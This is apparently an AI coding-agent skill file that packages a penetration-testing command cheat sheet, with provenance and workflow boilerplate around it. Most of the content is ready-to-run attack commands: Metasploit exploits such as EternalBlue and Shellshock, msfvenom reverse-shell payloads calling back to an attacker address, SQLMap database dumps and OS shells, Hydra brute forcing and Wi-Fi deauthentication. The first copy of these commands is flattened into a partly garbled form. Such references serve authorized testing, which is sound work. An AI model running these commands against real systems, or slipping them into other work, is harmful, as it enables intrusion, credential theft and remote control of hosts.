name: pentest-commands description: "Pentest Commands workflow skill. Use this skill when the user needs Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments and the operator should preserve the upstream workflow, copied support files, and provenance before merging or handing off." version: "0.0.1" category: testing-security tags: ["pentest-commands", "provide", "comprehensive", "command", "reference", "for", "penetration", "testing"] complexity: advanced risk: caution tools: ["codex-cli", "claude-code", "cursor", "gemini-cli", "opencode"] source: community author: "zebbern" date_added: "2026-04-15" date_updated: "2026-04-25"
Pentest Commands
Overview
This public intake copy packages plugins/antigravity-awesome-skills-claude/skills/pentest-commands from https://github.com/sickn33/antigravity-awesome-skills into the native Omni Skills editorial shape without hiding its origin.
Use it when the operator needs the upstream workflow, support files, and repository context to stay intact while the public validator and private enhancer continue their normal downstream flow.
This intake keeps the copied upstream files intact and uses the external_source block in metadata.json plus ORIGIN.md as the provenance anchor for review.
AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments. # Pentest Commands
Imported source sections that did not map cleanly to the public headings are still preserved below or in the support files. Notable imported sections: Purpose, Inputs/Prerequisites, Outputs/Deliverables, Constraints.
When to Use This Skill
Use this section as the trigger filter. It should make the activation boundary explicit before the operator loads files, runs commands, or opens a pull request.
- This skill is applicable to execute the workflow or actions described in the overview.
- Use when the request clearly matches the imported source intent: Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.
- Use when the operator should preserve upstream workflow detail instead of rewriting the process from scratch.
- Use when provenance needs to stay visible in the answer, PR, or review packet.
- Use when copied upstream references, examples, or scripts materially improve the answer.
- Use when the workflow should remain reviewable in the public intake repo before the private enhancer takes over.
Operating Table
| Situation | Start here | Why it matters |
|---|---|---|
| First-time use | metadata.json | Confirms repository, branch, commit, and imported path through the external_source block before touching the copied workflow |
| Provenance review | ORIGIN.md | Gives reviewers a plain-language audit trail for the imported source |
| Workflow execution | SKILL.md | Starts with the smallest copied file that materially changes execution |
| Supporting context | SKILL.md | Adds the next most relevant copied source file without loading the entire package |
| Handoff decision | ## Related Skills | Helps the operator switch to a stronger native skill when the task drifts |
Workflow
This workflow is intentionally editorial and operational at the same time. It keeps the imported source useful to the operator while still satisfying the public intake standards that feed the downstream enhancer flow.
- Nmap Commands Host Discovery: `bash # Ping sweep nmap -sP 192.168.1.0/24 # List IPs without scanning nmap -sL 192.168.1.0/24 # Ping scan (host discovery) nmap -sn 192.168.1.0/24 Port Scanning: bash # TCP SYN scan (stealth) nmap -sS 192.168.1.1 # Full TCP connect scan nmap -sT 192.168.1.1 # UDP scan nmap -sU 192.168.1.1 # All ports (1-65535) nmap -p- 192.168.1.1 # Specific ports nmap -p 22,80,443 192.168.1.1 Service Detection: bash # Service versions nmap -sV 192.168.1.1 # OS detection nmap -O 192.168.1.1 # Comprehensive scan nmap -A 192.168.1.1 # Skip host discovery nmap -Pn 192.168.1.1 NSE Scripts: bash # Vulnerability scan nmap --script vuln 192.168.1.1 # SMB enumeration nmap --script smb-enum-shares -p 445 192.168.1.1 # HTTP enumeration nmap --script http-enum -p 80 192.168.1.1 # Check EternalBlue nmap --script smb-vuln-ms17-010 192.168.1.1 # Check MS08-067 nmap --script smb-vuln-ms08-067 192.168.1.1 # SSH brute force nmap --script ssh-brute -p 22 192.168.1.1 # FTP anonymous nmap --script ftp-anon 192.168.1.1 # DNS brute force nmap --script dns-brute 192.168.1.1 # HTTP methods nmap -p80 --script http-methods 192.168.1.1 # HTTP headers nmap -p80 --script http-headers 192.168.1.1 # SQL injection check nmap --script http-sql-injection -p 80 192.168.1.1 Advanced Scans: bash # Xmas scan nmap -sX 192.168.1.1 # ACK scan (firewall detection) nmap -sA 192.168.1.1 # Window scan nmap -sW 192.168.1.1 # Traceroute nmap --traceroute 192.168.1.1 ### 2.
- Metasploit Commands Basic Usage: bash # Launch Metasploit msfconsole # Search for exploits search type:exploit name:smb # Use exploit use exploit/windows/smb/ms17010eternalblue # Show options show options # Set target set RHOST 192.168.1.1 # Set payload set PAYLOAD windows/meterpreter/reversetcp # Run exploit exploit Common Exploits: bash # EternalBlue msfconsole -x "use exploit/windows/smb/ms17010eternalblue; set RHOST 192.168.1.1; exploit" # MS08-067 (Conficker) msfconsole -x "use exploit/windows/smb/ms08067netapi; set RHOST 192.168.1.1; exploit" # vsftpd backdoor msfconsole -x "use exploit/unix/ftp/vsftpd234backdoor; set RHOST 192.168.1.1; exploit" # Shellshock msfconsole -x "use exploit/linux/http/apachemodcgibashenvexec; set RHOST 192.168.1.1; exploit" # Drupalgeddon2 msfconsole -x "use exploit/unix/webapp/drupaldrupalgeddon2; set RHOST 192.168.1.1; exploit" # PSExec msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit" Scanners: bash # TCP port scan msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run" # SMB version scan msfconsole -x "use auxiliary/scanner/smb/smbversion; set RHOSTS 192.168.1.0/24; run" # SMB share enumeration msfconsole -x "use auxiliary/scanner/smb/smbenumshares; set RHOSTS 192.168.1.0/24; run" # SSH brute force msfconsole -x "use auxiliary/scanner/ssh/sshlogin; set RHOSTS 192.168.1.0/24; set USERFILE users.txt; set PASSFILE passwords.txt; run" # FTP brute force msfconsole -x "use auxiliary/scanner/ftp/ftplogin; set RHOSTS 192.168.1.0/24; set USERFILE users.txt; set PASSFILE passwords.txt; run" # RDP scanning msfconsole -x "use auxiliary/scanner/rdp/rdpscanner; set RHOSTS 192.168.1.0/24; run" Handler Setup: bash # Multi-handler for reverse shells msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reversetcp; set LHOST 192.168.1.2; set LPORT 4444; exploit" Payload Generation (msfvenom): bash # Windows reverse shell msfvenom -p windows/meterpreter/reversetcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe # Linux reverse shell msfvenom -p linux/x64/shellreversetcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf # PHP reverse shell msfvenom -p php/reversephp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php # ASP reverse shell msfvenom -p windows/shellreversetcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp # WAR file msfvenom -p java/jspshellreversetcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war # Python payload msfvenom -p cmd/unix/reversepython LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py ### 3.
- Nikto Commands bash # Basic scan nikto -h http://192.168.1.1 # Comprehensive scan nikto -h http://192.168.1.1 -C all # Output to file nikto -h http://192.168.1.1 -output report.html # Plugin-based scans nikto -h http://192.168.1.1 -Plugins robots nikto -h http://192.168.1.1 -Plugins shellshock nikto -h http://192.168.1.1 -Plugins heartbleed nikto -h http://192.168.1.1 -Plugins ssl # Export to Metasploit nikto -h http://192.168.1.1 -Format msf+ # Specific tuning nikto -h http://192.168.1.1 -Tuning 1 # Interesting files only ### 4.
- SQLMap Commands bash # Basic injection test sqlmap -u "http://192.168.1.1/page?id=1" # Enumerate databases sqlmap -u "http://192.168.1.1/page?id=1" --dbs # Enumerate tables sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables # Dump table sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump # OS shell sqlmap -u "http://192.168.1.1/page?id=1" --os-shell # POST request sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test" # Cookie injection sqlmap -u "http://192.168.1.1/page" --cookie="id=1*" # Bypass WAF sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment # Risk and level sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5 ### 5.
- Hydra Commands bash # SSH brute force hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1 # FTP brute force hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1 # HTTP POST form hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid" # HTTP Basic Auth hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/ # SMB brute force hydra -l admin -P passwords.txt smb://192.168.1.1 # RDP brute force hydra -l admin -P passwords.txt rdp://192.168.1.1 # MySQL brute force hydra -l root -P passwords.txt mysql://192.168.1.1 # Username list hydra -L users.txt -P passwords.txt ssh://192.168.1.1 ### 6.
- John the Ripper Commands bash # Crack password file john hash.txt # Specify wordlist john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt # Show cracked passwords john hash.txt --show # Specify format john hash.txt --format=raw-md5 john hash.txt --format=nt john hash.txt --format=sha512crypt # SSH key passphrase ssh2john idrsa > sshhash.txt john sshhash.txt --wordlist=/usr/share/wordlists/rockyou.txt # ZIP password zip2john file.zip > ziphash.txt john ziphash.txt ### 7.
- Aircrack-ng Commands bash # Monitor mode airmon-ng start wlan0 # Capture packets airodump-ng wlan0mon # Target specific network airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon # Deauth attack aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon # Crack WPA handshake aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap ### 8.
Imported Workflow Notes
Imported: Core Workflow
1. Nmap Commands
Host Discovery:
# Ping sweep
nmap -sP 192.168.1.0/24
# List IPs without scanning
nmap -sL 192.168.1.0/24
# Ping scan (host discovery)
nmap -sn 192.168.1.0/24
Port Scanning:
# TCP SYN scan (stealth)
nmap -sS 192.168.1.1
# Full TCP connect scan
nmap -sT 192.168.1.1
# UDP scan
nmap -sU 192.168.1.1
# All ports (1-65535)
nmap -p- 192.168.1.1
# Specific ports
nmap -p 22,80,443 192.168.1.1
Service Detection:
# Service versions
nmap -sV 192.168.1.1
# OS detection
nmap -O 192.168.1.1
# Comprehensive scan
nmap -A 192.168.1.1
# Skip host discovery
nmap -Pn 192.168.1.1
NSE Scripts:
# Vulnerability scan
nmap --script vuln 192.168.1.1
# SMB enumeration
nmap --script smb-enum-shares -p 445 192.168.1.1
# HTTP enumeration
nmap --script http-enum -p 80 192.168.1.1
# Check EternalBlue
nmap --script smb-vuln-ms17-010 192.168.1.1
# Check MS08-067
nmap --script smb-vuln-ms08-067 192.168.1.1
# SSH brute force
nmap --script ssh-brute -p 22 192.168.1.1
# FTP anonymous
nmap --script ftp-anon 192.168.1.1
# DNS brute force
nmap --script dns-brute 192.168.1.1
# HTTP methods
nmap -p80 --script http-methods 192.168.1.1
# HTTP headers
nmap -p80 --script http-headers 192.168.1.1
# SQL injection check
nmap --script http-sql-injection -p 80 192.168.1.1
Advanced Scans:
# Xmas scan
nmap -sX 192.168.1.1
# ACK scan (firewall detection)
nmap -sA 192.168.1.1
# Window scan
nmap -sW 192.168.1.1
# Traceroute
nmap --traceroute 192.168.1.1
2. Metasploit Commands
Basic Usage:
# Launch Metasploit
msfconsole
# Search for exploits
search type:exploit name:smb
# Use exploit
use exploit/windows/smb/ms17_010_eternalblue
# Show options
show options
# Set target
set RHOST 192.168.1.1
# Set payload
set PAYLOAD windows/meterpreter/reverse_tcp
# Run exploit
exploit
Common Exploits:
# EternalBlue
msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOST 192.168.1.1; exploit"
# MS08-067 (Conficker)
msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.1; exploit"
# vsftpd backdoor
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; set RHOST 192.168.1.1; exploit"
# Shellshock
msfconsole -x "use exploit/linux/http/apache_mod_cgi_bash_env_exec; set RHOST 192.168.1.1; exploit"
# Drupalgeddon2
msfconsole -x "use exploit/unix/webapp/drupal_drupalgeddon2; set RHOST 192.168.1.1; exploit"
# PSExec
msfconsole -x "use exploit/windows/smb/psexec; set RHOST 192.168.1.1; set SMBUser user; set SMBPass pass; exploit"
Scanners:
# TCP port scan
msfconsole -x "use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run"
# SMB version scan
msfconsole -x "use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.0/24; run"
# SMB share enumeration
msfconsole -x "use auxiliary/scanner/smb/smb_enumshares; set RHOSTS 192.168.1.0/24; run"
# SSH brute force
msfconsole -x "use auxiliary/scanner/ssh/ssh_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# FTP brute force
msfconsole -x "use auxiliary/scanner/ftp/ftp_login; set RHOSTS 192.168.1.0/24; set USER_FILE users.txt; set PASS_FILE passwords.txt; run"
# RDP scanning
msfconsole -x "use auxiliary/scanner/rdp/rdp_scanner; set RHOSTS 192.168.1.0/24; run"
Handler Setup:
# Multi-handler for reverse shells
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.2; set LPORT 4444; exploit"
Payload Generation (msfvenom):
# Windows reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > shell.exe
# Linux reverse shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf > shell.elf
# PHP reverse shell
msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
# ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f asp > shell.asp
# WAR file
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f war > shell.war
# Python payload
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.2 LPORT=4444 -f raw > shell.py
3. Nikto Commands
# Basic scan
nikto -h http://192.168.1.1
# Comprehensive scan
nikto -h http://192.168.1.1 -C all
# Output to file
nikto -h http://192.168.1.1 -output report.html
# Plugin-based scans
nikto -h http://192.168.1.1 -Plugins robots
nikto -h http://192.168.1.1 -Plugins shellshock
nikto -h http://192.168.1.1 -Plugins heartbleed
nikto -h http://192.168.1.1 -Plugins ssl
# Export to Metasploit
nikto -h http://192.168.1.1 -Format msf+
# Specific tuning
nikto -h http://192.168.1.1 -Tuning 1 # Interesting files only
4. SQLMap Commands
# Basic injection test
sqlmap -u "http://192.168.1.1/page?id=1"
# Enumerate databases
sqlmap -u "http://192.168.1.1/page?id=1" --dbs
# Enumerate tables
sqlmap -u "http://192.168.1.1/page?id=1" -D database --tables
# Dump table
sqlmap -u "http://192.168.1.1/page?id=1" -D database -T users --dump
# OS shell
sqlmap -u "http://192.168.1.1/page?id=1" --os-shell
# POST request
sqlmap -u "http://192.168.1.1/login" --data="user=admin&pass=test"
# Cookie injection
sqlmap -u "http://192.168.1.1/page" --cookie="id=1*"
# Bypass WAF
sqlmap -u "http://192.168.1.1/page?id=1" --tamper=space2comment
# Risk and level
sqlmap -u "http://192.168.1.1/page?id=1" --risk=3 --level=5
5. Hydra Commands
# SSH brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1
# FTP brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://192.168.1.1
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# HTTP Basic Auth
hydra -l admin -P passwords.txt 192.168.1.1 http-get /admin/
# SMB brute force
hydra -l admin -P passwords.txt smb://192.168.1.1
# RDP brute force
hydra -l admin -P passwords.txt rdp://192.168.1.1
# MySQL brute force
hydra -l root -P passwords.txt mysql://192.168.1.1
# Username list
hydra -L users.txt -P passwords.txt ssh://192.168.1.1
6. John the Ripper Commands
# Crack password file
john hash.txt
# Specify wordlist
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# Show cracked passwords
john hash.txt --show
# Specify format
john hash.txt --format=raw-md5
john hash.txt --format=nt
john hash.txt --format=sha512crypt
# SSH key passphrase
ssh2john id_rsa > ssh_hash.txt
john ssh_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
# ZIP password
zip2john file.zip > zip_hash.txt
john zip_hash.txt
7. Aircrack-ng Commands
# Monitor mode
airmon-ng start wlan0
# Capture packets
airodump-ng wlan0mon
# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Deauth attack
aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Crack WPA handshake
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
8. Wireshark/Tshark Commands
# Capture traffic
tshark -i eth0 -w capture.pcap
# Read capture file
tshark -r capture.pcap
# Filter by protocol
tshark -r capture.pcap -Y "http"
# Filter by IP
tshark -r capture.pcap -Y "ip.addr == 192.168.1.1"
# Extract HTTP data
tshark -r capture.pcap -Y "http" -T fields -e http.request.uri
Imported: Purpose
Provide a comprehensive command reference for penetration testing tools including network scanning, exploitation, password cracking, and web application testing. Enable quick command lookup during security assessments.
Examples
Example 1: Ask for the upstream workflow directly
Use @pentest-commands to handle <task>. Start from the copied upstream workflow, load only the files that change the outcome, and keep provenance visible in the answer.
Explanation: This is the safest starting point when the operator needs the imported workflow, but not the entire repository.
Example 2: Ask for a provenance-grounded review
Review @pentest-commands against metadata.json and ORIGIN.md, then explain which copied upstream files you would load first and why.
Explanation: Use this before review or troubleshooting when you need a precise, auditable explanation of origin and file selection.
Example 3: Narrow the copied support files before execution
Use @pentest-commands for <task>. Load only the copied references, examples, or scripts that change the outcome, and name the files explicitly before proceeding.
Explanation: This keeps the skill aligned with progressive disclosure instead of loading the whole copied package by default.
Example 4: Build a reviewer packet
Review @pentest-commands using the copied upstream files plus provenance, then summarize any gaps before merge.
Explanation: This is useful when the PR is waiting for human review and you want a repeatable audit packet.
Imported Usage Notes
Imported: Examples
Example 1: Quick Vulnerability Scan
nmap -sV --script vuln 192.168.1.1
Example 2: Web App Test
nikto -h http://target && sqlmap -u "http://target/page?id=1" --dbs
Best Practices
Treat the generated public skill as a reviewable packaging layer around the upstream repository. The goal is to keep provenance explicit and load only the copied source material that materially improves execution.
- Keep the imported skill grounded in the upstream repository; do not invent steps that the source material cannot support.
- Prefer the smallest useful set of support files so the workflow stays auditable and fast to review.
- Keep provenance, source commit, and imported file paths visible in notes and PR descriptions.
- Point directly at the copied upstream files that justify the workflow instead of relying on generic review boilerplate.
- Treat generated examples as scaffolding; adapt them to the concrete task before execution.
- Route to a stronger native skill when architecture, debugging, design, or security concerns become dominant.
Troubleshooting
Problem: The operator skipped the imported context and answered too generically
Symptoms: The result ignores the upstream workflow in plugins/antigravity-awesome-skills-claude/skills/pentest-commands, fails to mention provenance, or does not use any copied source files at all.
Solution: Re-open metadata.json, ORIGIN.md, and the most relevant copied upstream files. Check the external_source block first, then restate the provenance before continuing.
Problem: The imported workflow feels incomplete during review
Symptoms: Reviewers can see the generated SKILL.md, but they cannot quickly tell which references, examples, or scripts matter for the current task.
Solution: Point at the exact copied references, examples, scripts, or assets that justify the path you took. If the gap is still real, record it in the PR instead of hiding it.
Problem: The task drifted into a different specialization
Symptoms: The imported skill starts in the right place, but the work turns into debugging, architecture, design, security, or release orchestration that a native skill handles better. Solution: Use the related skills section to hand off deliberately. Keep the imported provenance visible so the next skill inherits the right context instead of starting blind.
Imported Troubleshooting Notes
Imported: Troubleshooting
| Issue | Solution |
|---|---|
| Scan too slow | Increase timing (-T4, -T5) |
| Ports filtered | Try different scan types |
| Exploit fails | Check target version compatibility |
| Passwords not cracking | Try larger wordlists, rules |
Related Skills
@00-andruia-consultant- Use when the work is better handled by that native specialization after this imported skill establishes context.@00-andruia-consultant-v2- Use when the work is better handled by that native specialization after this imported skill establishes context.@10-andruia-skill-smith- Use when the work is better handled by that native specialization after this imported skill establishes context.@10-andruia-skill-smith-v2- Use when the work is better handled by that native specialization after this imported skill establishes context.
Additional Resources
Use this support matrix and the linked files below as the operator packet for this imported skill. They should reflect real copied source material, not generic scaffolding.
| Resource family | What it gives the reviewer | Example path |
|---|---|---|
references | copied reference notes, guides, or background material from upstream | references/n/a |
examples | worked examples or reusable prompts copied from upstream | examples/n/a |
scripts | upstream helper scripts that change execution or validation | scripts/n/a |
agents | routing or delegation notes that are genuinely part of the imported package | agents/n/a |
assets | supporting assets or schemas copied from the source package | assets/n/a |
Imported Reference Notes
Imported: Quick Reference
Common Port Scans
# Quick scan
nmap -F 192.168.1.1
# Full comprehensive
nmap -sV -sC -A -p- 192.168.1.1
# Fast with version
nmap -sV -T4 192.168.1.1
Password Hash Types
| Mode | Type |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1800 | sha512crypt |
| 3200 | bcrypt |
| 13100 | Kerberoast |
Imported: Inputs/Prerequisites
- Kali Linux or penetration testing distribution
- Target IP addresses with authorization
- Wordlists for brute forcing
- Network access to target systems
- Basic understanding of tool syntax
Imported: Outputs/Deliverables
- Network enumeration results
- Identified vulnerabilities
- Exploitation payloads
- Cracked credentials
- Web vulnerability findings
Imported: Constraints
- Always have written authorization
- Some scans are noisy and detectable
- Brute forcing may lock accounts
- Rate limiting affects tools